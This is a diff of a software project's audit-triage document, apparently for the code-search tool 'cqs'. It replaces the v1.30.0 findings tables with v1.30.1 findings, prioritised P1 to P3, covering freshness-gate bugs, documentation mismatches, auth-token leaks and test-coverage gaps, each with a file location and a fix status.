+- **#1105 (slots+cache) introduced 8+ TOCTOU/race/cache-mismatch findings.** slot_remove vs slot_promote, slot migrate rollback, embedding_cache purpose column missing, model_fingerprint timestamp fallback breaking cross-slot copy, evict-vs-write race, EmbeddingCache vs QueryCache zero-handling divergence, cache stats silent-zero. The cache+slots subsystem is overdue for a hardening pass with locks (`.cqs/slots.lock`) and schema purposes.
+- **Determinism regressions cluster around HashMap iteration in algorithm code.** semantic_diff sort, bfs_expand seed enqueue, contrastive_neighbors top-K, doc_comments select, map_hunks_to_functions, find_type_overlap chunk_info — six findings, all the same root cause (HashMap iter into score-sorted result), and all easy fixes. One sweep PR closes them.
+- **The v1.30.0 critical surfaces shipped without tests.** #1113 (non-blocking HNSW rebuild), #1114 (single-registration registry), #1118 (serve auth — strip_token_param, missing-Host), #1120 (execution-provider split), serve data endpoints, 16 batch dispatch handlers — all under-tested. TC-HAP findings P2.78–P2.87 form a coherent test-debt PR series that would close ~10 findings and provide regression protection for the next release.
+- **Observability "applied to new modules but default-off" pattern.** v0.12.1 lesson lifted spans into every new module, but OB-V1.30-1 reveals the default subscriber drops everything. Fixing the default plus structured-field cleanup (P3.13) and lazy span propagation across spawn_blocking (P2.25) would make the existing instrumentation actually useful in production.

--- a/docs/audit-triage.md
+++ b/docs/audit-triage.md
@@ -1,236 +1,180 @@
-# v1.30.0 Post-Release Audit Triage
+# v1.30.1 Audit Triage
 
-Generated: 2026-04-26T20:42:41Z
-Total findings: 170 (8 batch 1 categories + 8 batch 2 categories)
+Generated: 2026-04-28T18:49:20Z
+Total findings: 144
+Categorization: P1 14, P2 32, P3 78, P4 23 (duplicate entries cross-referenced rather than removed; 3 are explicitly noted as subsumed)
 
-Classification: P1 (easy + high impact, fix immediately) · P2 (medium + high, batch) · P3 (easy + low, quick wins) · P4 (hard or low impact, issues or inline trivial)
+## Cross-cutting themes
 
-## Rolling Status (auto-updated as fixes land)
+- **`delta_saturated` flag is half-wired (3 findings, same root cause).** `WatchSnapshotInput` carries it, the wire shape serializes it, but `WatchSnapshot::compute()` never consults it. Surfaces in code-quality, data-safety, and adversarial test coverage. After a saturated rebuild discards on swap, the snapshot reports `Fresh` and `cqs eval --require-fresh` accepts a doomed rebuild. P1: defeats #1182's day-1 gate.
+- **`dropped_this_cycle` reset-before-publish defeats the freshness gate (3 findings, one fix).** Counter is zeroed at line 145 of `events.rs` before reindex completes; `publish_watch_snapshot` runs after the drain, so `compute()` never observes a non-zero value. AC-V1.30.1-4 adds the embedder-init-failure twist. P1 because it lets dropped events pass `--require-fresh` invisibly.
+- **`wait_for_fresh` is the new hot path and is full of papercuts (9+ findings across 7 categories).** Poll-cadence cost (RM-2, PF-V1.30.1-2), stringly-typed errors collapsed to `NoDaemon` (EH-V1.30.1-2, AC-V1.30.1-6), no entry/exit telemetry (OB-V1.30.1-4, OB-V1.30.1-6, OB-V1.30.1-8), `Instant` overflow (RB-2), 250 ms hardcoded interval (SHL-V1.30-2), no exponential backoff (RB-9), only the trivial Fresh-on-first-poll path tested (TC-HAP-1.30.1-5, TC-ADV-1.30.1-4). Treat as a single batch refactor pass.
+- **"Lying docs" cluster — P1 by team rule (5 findings).** PRIVACY says `(content_hash, model_id)` but schema is `(content_hash, model_fingerprint, purpose)`. SECURITY's symlink matrix promises "follow then validate" but the indexer skips them entirely. SECURITY's trust-level mitigation list claims `read --focus` and `context` carry `trust_level`/`injection_flags` — they don't. SECURITY's auth claim doesn't mention the `cqs_token_<port>` cookie or `NoAuthAcknowledgement`. ROADMAP says #1182 acceptance test is pending — #1196 already merged it.
+- **v0.12.1 swallow-error anti-pattern recurrence (7+ findings).** New code (`dispatch.rs:207`, `doctor.rs:923`, `cli/index/build.rs:863`, `reconcile.rs:116`, `reranker.rs:524`) ships with `.ok()` / `.unwrap_or_default()` swallowing real failures with no `tracing::warn!`. The exact pattern MEMORY.md called out post-v0.12.1 audit. EH-V1.30.1-* and TC-ADV-1.30.1-6 come at it from different angles.
+- **Wiring-verification regressions (3 findings, P1 by memory rule).** `embed_batch_size_for(model)` shipped as the v1.30.0 fix, still `#[allow(dead_code)]`, prod still uses unscaled `embed_batch_size()=64` — exactly the configurable-models disaster. `BatchCmd` dispatch is hand-routed match (33 arms); `log_query` hand-sprinkled across 6 dispatch arms.
+- **Coverage gaps where #1182 commands shipped untested (5 findings).** `cmd_uninstall`/`cmd_fire`/`cmd_hook_status` zero tests; `cmd_status` body never invoked by tests; `require_fresh_gate` itself never called by tests (env logic re-implemented inline); `process_file_changes` zero direct tests; `cqs eval` end-to-end never run *without* `CQS_EVAL_REQUIRE_FRESH=0` bypass.
+- **Three-channel auth surface has known bugs pinned in *tests that assert the wrong behavior* (4 findings).** SEC-7 leakage: `strip_token_param` doesn't case-fold or percent-decode; cookie wins over query so stale `?token=` survives in URL; Bearer prefix grammar gaps; reasoning-only collision tests. P1 because security-surface tests asserting current-bad behavior is the wrong shape per audit charter.
 
-- **P1 — 20/21 fixed + 1 deferred.** P1.17 (drain_pending_rebuild dedup) is structural — filed as #1124, slated to land alongside P2.29 (HNSW rebuild adversarial tests). Branch `audit-v1.30.0-p1-fixes` commit `cce0fbdc` covers all 20 applied.
-- **P2 — 83/92 fixed, 9 filed as issues.** All 92 P2 rows accounted for. Issues #1125 (P2.59), #1126 (P2.60), #1127 (P2.64), #1128 (P2.65), #1129 (P2.68), #1130 (P2.88), #1131 (P2.89), #1132 (P2.90), #1133 (P2.91).
-- **P3 — 49/53 fixed, 4 filed as issues #1137 (P3.26), #1138 (P3.27), #1139 (P3.30), #1140 (P3.31).** All 53 P3 rows accounted for.
-- **P4 — 0/3 fixed, 3 filed as issues #1134, #1135, #1136.**
+## P1 — Easy + high impact (fix immediately)
 
-(Counts include only `✅ fixed` cells; `structural — file as issue` rows count as deferred.)
+| ID | Title | Category | Location | Effort | Status |
+|----|-------|----------|----------|--------|--------|
+| CQ-V1.30.1-2 | `delta_saturated` flag published but ignored by `FreshnessState::compute` | Code Quality | `src/watch_status.rs:199-209` | easy | ✅ PR #1202 |
+| CQ-V1.30.1-1 | `dropped_this_cycle` reset before snapshot publish hides drop signal from `--require-fresh` | Code Quality | `src/cli/watch/events.rs:139-146` + `mod.rs:1303` | medium | ✅ PR #1202 |
+| CQ-V1.30.1-4 | `strip_token_param` doesn't case-fold or percent-decode — token leaks into redirect URL (SEC-7) | Code Quality | `src/serve/auth.rs:246-260, 305-318` | medium | ✅ PR #1201 |
+| AC-V1.30.1-5 | `check_request` cookie-wins-over-query leaks stale `?token=` permanently in URL bar | Algorithm Correctness | `src/serve/auth.rs:269-321` | easy | ✅ PR #1201. Notes: paired with CQ-V1.30.1-4. |
+| DOC-V1.30.1-1 | PRIVACY/SECURITY misstate embedding-cache primary key (drops `purpose` column) | Documentation | `PRIVACY.md:16`, `SECURITY.md:47` | easy | ✅ PR #1199 |
+| SEC-V1.30.1-2 | SECURITY.md "Symlink Behavior" matrix contradicts `enumerate_files(follow_links=false)` | Security | `SECURITY.md:203-215` | easy | ✅ PR #1199 |
+| SEC-V1.30.1-1 | SECURITY.md falsely claims `read --focus` / `context` carry `trust_level`/`injection_flags` | Security | `SECURITY.md:14` vs `read.rs:312`, `context.rs:269-325` | medium | ✅ PR #1200 |
+| DOC-V1.30.1-7 | SECURITY.md auth claim missing `cqs_token_<port>` cookie + `NoAuthAcknowledgement` from #1135/#1136 | Documentation | `SECURITY.md:17` | easy | ✅ PR #1201 |
+| DOC-V1.30.1-4 | ROADMAP claims #1182 acceptance test pending, but #1196 already merged | Documentation | `ROADMAP.md:16,142` | easy | ✅ PR #1199 |
+| SHL-V1.30-1 | `embed_batch_size_for` dead code — production still uses unscaled 64; nomic-coderank OOMs | Scaling | `src/cli/pipeline/types.rs:178-207`, `parsing.rs:42`, `enrichment.rs:74` | easy | ✅ PR #1203. Notes: Wiring-verification regression per MEMORY.md. |
+| SEC-V1.30.1-8 | Daemon env snapshot logs every `CQS_*` at info — `CQS_LLM_API_KEY` lands in journal | Security | `src/cli/watch/mod.rs:529-532` | easy | ✅ PR #1201 |
+| DS-V1.30.1-D2 | `run_daemon_reconcile` bypasses `max_pending_files()` cap — drowns queue on bulk branch switch | Data Safety | `src/cli/watch/reconcile.rs:103,128` | medium | ✅ PR #1203 |
+| AC-V1.30.1-1 | Reconcile `disk > stored` strict predicate misses `git checkout HEAD~5 -- foo.rs` (older mtime) | Algorithm Correctness | `src/cli/watch/reconcile.rs:124` | medium | ✅ PR #1203 |
+| AC-V1.30.1-4 | `process_file_changes` resets `dropped_this_cycle` before embedder check — drops silently lost on init failure | Algorithm Correctness | `src/cli/watch/events.rs:139-156` | medium | ✅ PR #1202. Notes: same root cause as CQ-V1.30.1-1. |
 
-## P1 — Fix Immediately
+## P2 — Medium effort + high impact (fix in batch)
 
-| # | Title | Category | Location | Status |
-|---|-------|----------|----------|--------|
-| P1.1 | PRIVACY/SECURITY claim query_log is opt-in but it's unconditional | Documentation | `PRIVACY.md:22, SECURITY.md:101` vs `src/cli/batch/commands.rs:371` | ✅ fixed |
-| P1.2 | PRIVACY claims 7-day TTL on query_cache.db; only size cap exists | Documentation | `PRIVACY.md:21` vs `src/cache.rs:1536` | ✅ fixed |
-| P1.3 | CHANGELOG names CQS_LLM_ENDPOINT — actual var is CQS_LLM_API_BASE | Documentation | `CHANGELOG.md:19` | ✅ fixed |
-| P1.4 | CONTRIBUTING tells contributors to edit dispatch.rs (registry.rs now) | Documentation | `CONTRIBUTING.md:339-355` | ✅ fixed |
-| P1.5 | ProjectRegistry doc lies about path on macOS/Windows | Platform | `src/project.rs:1-3, 176` | ✅ fixed |
-| P1.6 | gather warning hardcodes "200" — lies when CQS_GATHER_MAX_NODES set | Code Quality | `src/cli/commands/search/gather.rs:200` | ✅ fixed |
-| P1.7 | Reranker silently ignores [reranker] config section | Code Quality | `src/reranker.rs:127-154, 442` | ✅ fixed |
-| P1.8 | Embedder fingerprint falls back to repo:timestamp — cache thrash | Error Handling | `src/embedder/mod.rs:435-466` | ✅ fixed |
-| P1.9 | LocalProvider Mutex::into_inner().unwrap_or_default() loses all batch results on poison | Error Handling | `src/llm/local.rs:155, 196, 271-279, 305` | ✅ fixed |
-| P1.10 | LocalProvider unbounded HTTP body read — OOM on hostile/buggy server | Robustness | `src/llm/local.rs:97-100, 474-487` | ✅ fixed |
-| P1.11 | Auth token leaked into TraceLayer span URI logging | Security | `src/serve/mod.rs:195` + `src/serve/auth.rs:226` | ✅ fixed |
-| P1.12 | enforce_host_allowlist passes through missing Host header — DNS-rebinding bypass | Security | `src/serve/mod.rs:234-251` | ✅ fixed |
-| P1.13 | Auth token printed to stdout — captured by journald for 30-day retention | Security | `src/serve/mod.rs:111-117` | ✅ fixed |
-| P1.14 | cqs serve has no RequestBodyLimitLayer — authenticated client can OOM via large POST | Security | `src/serve/mod.rs:154-196` | ✅ fixed |
-| P1.15 | UMAP coords not invalidated on chunk content change — cluster view serves stale | Data Safety | `src/store/chunks/async_helpers.rs:339` | ✅ fixed |
-| P1.16 | --name-boost CLI accepts >1 / <0 — embedding signal sign-flips, deletes good results | Algorithm | `src/cli/args.rs:57` + `src/search/scoring/candidate.rs:286` | ✅ fixed (consumer-side clamp; CLI parser fix already shipped in v1.29.x) |
-| P1.17 | drain_pending_rebuild dedup drops fresh embeddings during rebuild window | Algorithm | `src/cli/watch.rs:1077-1105` | 📋 issue #1124 |
-| P1.18 | token_pack break-on-first-oversized — drops smaller items that would fit | Algorithm | `src/cli/commands/mod.rs:398-417` | ✅ fixed |
-| P1.19 | cqs serve shutdown handles only Ctrl-C — SIGTERM (systemctl) skips graceful drain | Platform | `src/serve/mod.rs:253-260` | ✅ fixed |
-| P1.20 | OB-V1.30-1 default subscriber drops every info_span — 150 spans invisible at default level | Observability | `src/main.rs:14-32` | ✅ fixed |
-| P1.21 | Auth failures log nothing — no journal trail for 401s | Observability | `src/serve/auth.rs:194-232` | ✅ fixed |
+| ID | Title | Category | Location | Effort | Status |
+|----|-------|----------|----------|--------|--------|
+| EH-V1.30.1-1 | Parse failure leaves stale chunks AND no mtime update — reconciles forever | Error Handling | `src/cli/watch/reindex.rs:255-314` | medium | pending |
+| EH-V1.30.1-2 | `wait_for_fresh` collapses transport AND parse errors into `NoDaemon` — wrong advice | Error Handling | `src/daemon_translate.rs:660-678` | easy | pending |
+| EH-V1.30.1-7 | Reconcile mtime-stat error swallowed — file may oscillate as "always stale" | Error Handling | `src/cli/watch/reconcile.rs:116-127` + `reindex.rs:501-509` | medium | pending |
+| EH-V1.30.1-8 | `try_init_embedder` Err path strands HNSW dirty flag without observability | Error Handling | `src/cli/watch/events.rs:154-185` | medium | pending |
+| RB-1 | `to_string_lossy()` on path keys silently mangles non-UTF-8 paths into permanent reindex storms | Robustness | `src/cli/watch/reconcile.rs:99` + `staleness.rs:627-637` | medium | pending |
+| RB-9 | `wait_for_fresh` infinite poll loop on slow daemon — no exp backoff, 2400 socket connects/600s | Robustness | `src/daemon_translate.rs:665-678` | medium | pending |
+| RB-10 | `now_unix_secs()` swallows clock-before-epoch error as `0` — masks systemic bad-clock | Robustness | `src/watch_status.rs:226-231` | easy | pending |
+| RB-6 | `enumerate_files` `unwrap_or(&path)` on canonicalize-mismatch leaks abs paths into rel workflow | Robustness | `src/lib.rs:680-685` | medium | pending |
+| AC-V1.30.1-3 | BFS `bfs_expand` cap check skips score-bump for already-visited neighbors at boundary | Algorithm Correctness | `src/gather.rs:357-381` | medium | pending |
+| AC-V1.30.1-9 | `daemon_socket_path` uses `DefaultHasher` — Rust-version-dependent, breaks systemd unit naming | Algorithm Correctness | `src/daemon_translate.rs:174-200` | medium | pending |
+| AC-V1.30.1-10 | `incremental_count = 0` reset on idle-clear loses delta context — late HNSW rebuilds | Algorithm Correctness | `src/cli/watch/mod.rs:1180` | medium | pending |
+| API-V1.30.1-1 | `cqs status --wait` emits success envelope but exits 1 on timeout — contradicts contract | API Design | `src/cli/commands/infra/status.rs:85-90` | easy | pending |
+| API-V1.30.1-5 | `daemon_ping`/`status`/`reconcile` return `Result<T, String>` — stringly-typed errors on public API | API Design | `src/daemon_translate.rs:271,422,541` | medium | pending |
+| API-V1.30.1-10 | `WatchSnapshot.idle_secs` frozen at compute time — wire shape lies once snapshot served later | API Design | `src/watch_status.rs:101,219` | medium | pending |
+| OB-V1.30.1-3 | `WatchSnapshot` state transitions silent — Fresh↔Stale↔Rebuilding flips have no journal trail | Observability | `src/cli/watch/mod.rs:149-185`, `watch_status.rs:195-224` | medium | pending |
+| OB-V1.30.1-6 | `require_fresh_gate` lacks entry span + final-decision info — eval gate decisions invisible | Observability | `src/cli/commands/eval/mod.rs:219-275` | easy | pending |
+| OB-V1.30.1-8 | `daemon_status` connect-failure warns every 250 ms during startup race — 2400 lines/600s wait | Observability | `src/daemon_translate.rs:438-441` | medium | pending |
+| OB-V1.30.1-9 | `process_file_changes` uses `println!` in non-quiet — bypasses tracing infrastructure | Observability | `src/cli/watch/events.rs:147-152` | easy | pending |
+| OB-V1.30.1-10 | `serve::search` info logs full query at info — bypasses TraceLayer redaction | Observability | `src/serve/handlers.rs:189-232` | easy | pending |
+| PB-V1.30.1-1 | `cmd_serve` `--no-auth` warning misses `0.0.0.0` and `::` wildcard binds — most-exposed configs | Platform Behavior | `src/cli/commands/serve.rs:27` | easy | pending |
+| PB-V1.30.1-3 | `process_exists` (Windows) substring-matches `INFO:` against localized `tasklist` output | Platform Behavior | `src/cli/files.rs:59-72` | medium | pending |
+| PB-V1.30.1-7 | `cqs hook fire` on Windows-native: `.cqs/.dirty` written but no consumer ever reads it | Platform Behavior | `src/cli/commands/infra/hook.rs:309-335` | medium | pending |
+| SEC-V1.30.1-3 | `callgraph-3d.js` interpolates `e.message` into `innerHTML` without `escapeHtml` — XSS gap | Security | `src/serve/assets/views/callgraph-3d.js:55` | easy | pending |
+| SEC-V1.30.1-4 | `tag_user_code_trust_level` shape-coupled — silently no-ops on unknown JSON shapes | Security | `src/cli/commands/mod.rs:216-257` | medium | pending |
+| DS-V1.30.1-D1 | `cqs index --force` reopen leaves stale `pending_rebuild` against orphaned store handle | Data Safety | `src/cli/watch/mod.rs:1102-1122` | medium | pending |
+| DS-V1.30.1-D5 | `.cqs/.dirty` fallback marker write not atomic — crash drops the only signal daemon will see | Data Safety | `src/cli/commands/infra/hook.rs:329-332` | easy | pending |
+| DS-V1.30.1-D7 | HNSW rollback path leaves `.bak` files orphaned when restore-rename fails | Data Safety | `src/hnsw/persist.rs:509-553` | medium | pending |
+| TC-HAP-1.30.1-2 | `cmd_uninstall`, `cmd_fire`, `cmd_hook_status` — three CLI commands ship with zero tests | Test Coverage (happy) | `src/cli/commands/infra/hook.rs:262-373` | medium | pending |
+| TC-HAP-1.30.1-3 | `cmd_status` — 6-row behavior matrix promised, zero outcomes pinned | Test Coverage (happy) | `src/cli/commands/infra/status.rs:38-103` | medium | pending |
+| TC-HAP-1.30.1-4 | `require_fresh_gate` — function never called by any test; bypass logic re-implemented inline | Test Coverage (happy) | `src/cli/commands/eval/mod.rs:219-275` | easy | pending |
+| TC-HAP-1.30.1-7 | Eval freshness gate untested end-to-end — every test sets `CQS_EVAL_REQUIRE_FRESH=0` bypass | Test Coverage (happy) | `tests/eval_subcommand_test.rs:88-93` | medium | pending |
 
-## P2 — Batch Fix
+## P3 — Easy + low impact (fix if time)
 
-| # | Title | Category | Location | Status |
-|---|-------|----------|----------|--------|
-| P2.1 | cmd_similar JSON emits 3 fields vs CLI's 9 — schema parity drop | Code Quality | `src/cli/batch/handlers/info.rs:139` | ✅ fixed |
-| P2.2 | dispatch_diff target_store placeholder dead in else branch | Code Quality | `src/cli/batch/handlers/misc.rs:354-387` | ✅ fixed |
-| P2.3 | Embedding/Query cache open_with_runtime ~80% copy-paste (90+ lines) | Code Quality | `src/cache.rs:103-220, 1412-1522` | ✅ fixed |
-| P2.4 | Repeated env::var parse pattern at 25+ sites — shared helpers exist but private | Code Quality | `src/limits.rs:230-260` + 25 sites | ✅ fixed (helpers promoted to pub; reranker + 2 embedder sites swapped, others left to keep tracing logs) |
-| P2.5 | EmbeddingCache accepts MAX_SIZE=0; QueryCache rejects — opposite behavior | Code Quality | `src/cache.rs:206-209, 1509-1513` | ✅ fixed |
-| P2.6 | DOC: README "544-query eval" should be 218; metrics also stale | Documentation | `README.md:5,649` | ✅ fixed |
-| P2.7 | DOC: README claims 54 languages but Cargo.toml/source disagree (Elm) | Documentation | `README.md:5,530-585` | ✅ fixed |
-| P2.8 | DOC: SECURITY omits per-project embeddings_cache.db | Documentation | `SECURITY.md:65-82` | ✅ fixed |
-| P2.9 | DOC: README/Claude integration list missing 5 commands (ping/eval/model/serve/refresh) | Documentation | `README.md:467-525` | ✅ fixed |
-| P2.10 | DOC: README cache subcommands list missing `clear` | Documentation | `README.md:521` | ✅ fixed |
-| P2.11 | --json model swap/show emits plain-text errors — no envelope | API Design | `src/cli/commands/infra/model.rs` | ✅ fixed |
-| P2.12 | cqs init/index/convert lack --json | API Design | `src/cli/commands/infra/init.rs`, etc. | ✅ fixed |
-| P2.13 | Global --slot silently ignored by `slot`/`cache` subcommands | API Design | `src/cli/definitions.rs` + slot/cache cmds | ✅ fixed (Option B: bail in cmd_slot/cmd_cache) |
-| P2.14 | cqs refresh has no --json | API Design | `src/cli/definitions.rs:755-761` | ✅ fixed |
-| P2.15 | List-shape JSON envelopes inconsistent across `*list` commands | API Design | `cmd_ref_list/cmd_model_list/cmd_project_list` | ✅ fixed (ref + model now emit `{plural: [...]}` shape; project already had it) |
-| P2.16 | cache stats mixes bytes and MB; cache compact uses bytes only | API Design | `src/cli/commands/infra/cache_cmd.rs` | ✅ fixed |
-| P2.17 | dispatch::try_daemon_query warns then silently re-runs in CLI | Error Handling | `src/cli/dispatch.rs:445-462` | ✅ fixed |
-| P2.18 | LocalProvider::fetch_batch_results returns empty map on missing batch_id | Error Handling | `src/llm/local.rs:542-547` | ✅ fixed (added `LlmError::BatchNotFound`) |
-| P2.19 | impact/format `serde_json::to_value...unwrap_or_else(json!({}))` at 6 sites | Error Handling | `src/impact/format.rs`, etc. | ✅ fixed (impact/format + context.rs sites — blame.rs out-of-scope, owned by Agent A) |
-| P2.20 | cache_stats silently treats QueryCache::open failure as 0 bytes | Error Handling | `src/cli/commands/infra/cache_cmd.rs:120-139` | ✅ fixed |
-| P2.21 | slot_remove masks list_slots failure as "only slot remaining" | Error Handling | `src/cli/commands/infra/slot.rs:303-313` | ✅ fixed |
-| P2.22 | build_token_pack swallows get_caller_counts_batch — silently degrades ranking | Error Handling | `src/cli/commands/io/context.rs:438-441` | ✅ fixed |
-| P2.23 | read --focus silently empties type_chunks on store batch failure | Error Handling | `src/cli/commands/io/read.rs:230-235` | ✅ fixed (added `warnings` field to FocusedReadResult/JsonOutput) |
-| P2.24 | serve::build_chunk_detail collapses NULL signature/content to empty string | Error Handling | `src/serve/data.rs:488-492` | ✅ fixed (signature/content_preview now `Option<String>`; JS shows `<missing — DB column NULL>` placeholder) |
-| P2.25 | Per-request span and build_* spans disconnected (spawn_blocking drops span ctx) | Observability | `src/serve/handlers.rs:86,111,131,160,210,236` | ✅ fixed (capture `Span::current()` and re-enter inside the blocking closure at all 6 handlers) |
-| P2.26 | TC-ADV: LocalProvider body-size DoS — buffers entire HTTP response | Test Coverage (adv) | `src/llm/local.rs:474-500` | ✅ fixed (regression-pin tests at `src/llm/local.rs::body_size_dos_tests`: `oversized_response_body_capped_at_max`, `fourxx_with_large_body_does_not_buffer_entire_body`) |
-| P2.27 | TC-ADV: EmbeddingCache/QueryCache accept NaN/Inf — cross-process cache poisoning | Test Coverage (adv) | `src/cache.rs:332-407, 1677-1699` | ✅ fixed |
-| P2.28 | TC-ADV: slot_create/slot_remove TOCTOU under concurrent operation | Test Coverage (adv) | `src/cli/commands/infra/slot.rs:219-350` | ✅ fixed (regression-pin test added: `slot_create_concurrent_same_name_produces_deterministic_outcome`) |
-| P2.29 | TC-ADV: Non-blocking HNSW rebuild — no panic/dim-drift/store-fail tests | Test Coverage (adv) | `src/cli/watch.rs:965-1042` | ✅ fixed (regression-pin tests: `spawn_hnsw_rebuild_dim_mismatch_returns_error_outcome`, `spawn_hnsw_rebuild_missing_index_path_returns_error_outcome`, `drain_clears_pending_when_spawned_rebuild_errors`) |
-| P2.30 | TC-ADV: serve auth strip_token_param case/percent-encoding gaps | Test Coverage (adv) | `src/serve/auth.rs:101-115` | ✅ tests pinned current behavior (capital `Token=`, `%74oken=`, `&&`, multiple `token=`, empty value, capital-T check_request rejects); prod fix follow-on |
-| P2.31 | TC-ADV: slot::migrate_legacy rollback path untested; rollback failure leaves split state | Test Coverage (adv) | `src/slot/mod.rs:511-593` | ✅ fixed (regression-pin tests: `migrate_refuses_to_proceed_when_sentinel_exists`, `migrate_clears_sentinel_on_full_success`) |
-| P2.32 | TC-ADV: LocalProvider non-HTTP api_base + concurrency mis-sizing | Test Coverage (adv) | `src/llm/local.rs:88-121` | ✅ prod fix (api_base scheme guard + worker = min(concurrency, items.len()).max(1)); test skeletons left to follow-on |
-| P2.33 | RB: Slot pointer files read with unbounded read_to_string | Robustness | `src/slot/mod.rs:207, 323` | ✅ fixed |
-| P2.34 | RB: migrate_legacy rollback leaves undetectable half-state | Robustness | `src/slot/mod.rs:511-593` | ✅ fixed |
-| P2.35 | RB: local.rs auth_attempts mutex unwrap cascades worker poison | Robustness | `src/llm/local.rs:393-396` | ✅ fixed |
-| P2.36 | RB: redirect policy disagrees between production (none) and doctor (limited(2)) | Robustness | `src/llm/local.rs:99` vs `src/cli/commands/infra/doctor.rs:578` | ✅ fixed (LocalProvider now uses `limited(2)` to match doctor) |
-| P2.37 | SHL: CAGRA itopk_size < k on small indexes — silent zero-result regression | Scaling | `src/cagra.rs:359` | ✅ fixed (force itopk_size ≥ k; warn-and-empty when k > itopk_max so caller falls back to HNSW) |
-| P2.38 | SHL: nl::generate_nl char_budget defaults to 512 even with 2048 max_seq_len | Scaling | `src/nl/mod.rs:222-229` | ✅ fixed (added `generate_nl_with_template_and_seq_len` + `_with_seq_len` accessor; legacy entry points keep env-only behavior) |
-| P2.39 | SHL: MAX_BATCH_SIZE=10_000 silently truncates summary/HyDE on large corpora | Scaling | `src/llm/mod.rs:192` | ✅ fixed (`crate::limits::llm_max_batch_size` reads CQS_LLM_MAX_BATCH_SIZE; truncation now surfaces on stderr) |
-| P2.40 | SHL: serve graph/cluster cap 50_000 hardcoded; chunk_detail LIMIT 50/50/20 | Scaling | `src/serve/data.rs:17,24,505,542,571` | ✅ fixed (env-tunable via `CQS_SERVE_GRAPH_MAX_NODES/EDGES`, `CQS_SERVE_CLUSTER_MAX_NODES`, `CQS_SERVE_CHUNK_DETAIL_{CALLERS,CALLEES,TESTS}` in `crate::limits`; clamped to hard ceilings) |
-| P2.41 | SHL: embed_batch_size default 64 doesn't scale with model dim/seq | Scaling | `src/cli/pipeline/types.rs:143` | ✅ fixed (added `embed_batch_size_for(model)`; pipeline migration follow-on) |
-| P2.42 | SHL: CagraIndex::gpu_available has no VRAM ceiling — OOMs on 8GB GPUs | Scaling | `src/cagra.rs:262-264` | ✅ fixed (`gpu_available_for(n,dim)` with 2 GiB conservative cap + `CQS_CAGRA_MAX_GPU_BYTES`; legacy `gpu_available` shims through) |
-| P2.43 | semantic_diff sort lacks tie-breaker — non-deterministic JSON across runs | Algorithm | `src/diff.rs:202-207` | ✅ fixed (already cascading; pinned by existing `test_diff_sort_tie_break_deterministic`) |
-| P2.44 | is_structural_query keyword probe misses keywords at end-of-query | Algorithm | `src/search/router.rs:787-789` | ✅ fixed (regression-pin tests added: `test_p2_44_*`) |
-| P2.45 | bfs_expand processes seeds in HashMap order — non-deterministic name_scores at cap | Algorithm | `src/gather.rs:317-320` | ✅ fixed (regression-pin test added: `test_p2_45_bfs_seed_order_is_deterministic`) |
-| P2.46 | llm summary contrastive_neighbors top-K sort lacks tie-breaker | Algorithm | `src/llm/summary.rs:263-267` | ✅ fixed (regression-pin test added: `p2_46_contrastive_neighbors_top_k_deterministic_under_ties`) |
-| P2.47 | reranker compute_scores unchecked batch_size*stride; negative shape[1] panic | Algorithm | `src/reranker.rs:368-387` | ✅ fixed (already guarded via AC-V1.29-6; verified) |
-| P2.48 | doc_comments select_uncached sort lacks chunk-id tertiary key | Algorithm | `src/llm/doc_comments.rs:222-242` | ✅ fixed (already cascading on `a.id.cmp(&b.id)`; verified) |
-| P2.49 | map_hunks_to_functions returns hunks in HashMap order — non-deterministic impact-diff | Algorithm | `src/impact/diff.rs:38-168` | ✅ fixed (BTreeMap by_file + post-loop sort on (file, line_start, name)) |
-| P2.50 | search_reference threshold/weight ordering bug — under-samples corpus when weight<1 | Algorithm | `src/reference.rs:231-285` | ✅ fixed (relax raw_threshold = threshold/weight + 2× over-fetch + post-weight retain/sort/truncate) |
-| P2.51 | find_type_overlap chunk_info uses HashMap iteration — non-deterministic file attribution | Algorithm | `src/related.rs:131-157` | ✅ fixed (sorted result keys + min(file,line) representative + (count desc, name asc) tie-break + sorted type_names) |
-| P2.52 | CAGRA search_with_filter under-fills when included<k — caller can't distinguish | Algorithm | `src/cagra.rs:520-598` | ✅ fixed (cap effective_k = k.min(included)) |
-| P2.53 | Hybrid SPLADE alpha=0 emits 1.0+s scores; cliff at SPLADE boundary | Algorithm | `src/search/query.rs:649-672` | ✅ fixed (boost = s * 0.1; dense cosine remains dominant signal) |
-| P2.54 | apply_scoring_pipeline sign-flips on out-of-range name_boost; clamp embedding pre-blend | Algorithm | `src/search/scoring/candidate.rs:283-298` | ✅ fixed (clamp `embedding_score` into [0,1] before blend; name_boost clamp already present) |
-| P2.55 | open_browser uses explorer.exe on Windows — drops query string/token | Platform | `src/cli/commands/serve.rs:89-104` | ✅ fixed |
-| P2.56 | NTFS/FAT32 mtime equality check — watch loop skips second save on FAT32 USB | Platform | `src/cli/watch.rs:551-560` | ✅ fixed (actual equality at watch.rs:2475 — strict `<` on WSL drvfs paths) |
-| P2.57 | enforce_host_allowlist accepts missing Host header (dev ergonomic) | Platform | `src/serve/mod.rs:230-251` | ✅ fixed (covered by P1.12 — now rejects missing Host) |
-| P2.58 | --bind 0.0.0.0 host-allowlist breaks LAN — pushes operators to --no-auth | Security | `src/serve/mod.rs:207-218` | ✅ fixed (wildcard bind returns empty allowlist + startup warn; middleware short-circuits to "accept any Host"; per-launch token remains primary defence — avoids new `if_addrs` dep) |
-| P2.59 | Migration restore_from_backup overwrites live DB while pool open | Data Safety | `src/store/backup.rs:171-180` | 📋 issue #1125 |
-| P2.60 | stream_summary_writer bypasses WRITE_LOCK — concurrent writer collides with reindex | Data Safety | `src/store/chunks/crud.rs:504-545` | 📋 issue #1126 |
-| P2.61 | slot_remove TOCTOU on concurrent promote — active_slot points to deleted dir | Data Safety | `src/cli/commands/infra/slot.rs:299-350` | ✅ fixed |
-| P2.62 | Slot legacy migration moves live WAL/SHM instead of checkpointing first | Data Safety | `src/slot/mod.rs:511-624` | ✅ fixed |
-| P2.63 | model_fingerprint fallback uses Unix timestamp — every restart misses cache | Data Safety | `src/embedder/mod.rs:435-465` | ✅ fixed |
-| P2.64 | Daemon serializes ALL queries through one Mutex<BatchContext> | Data Safety | `src/cli/watch.rs:1775-1858` | 📋 issue #1127 |
-| P2.65 | embedding_cache schema doesn't separate `embedding` vs `embedding_base` purpose | Data Safety | `src/cache.rs:159-171` | 📋 issue #1128 |
-| P2.66 | cache evict() vs write_batch race — evict deletes rows just inserted | Data Safety | `src/cache.rs:354-460` | ✅ fixed |
-| P2.67 | PF: reindex_files watch path double-parses calls per chunk | Performance | `src/cli/watch.rs:2815, 2930-2939` | ✅ fixed |
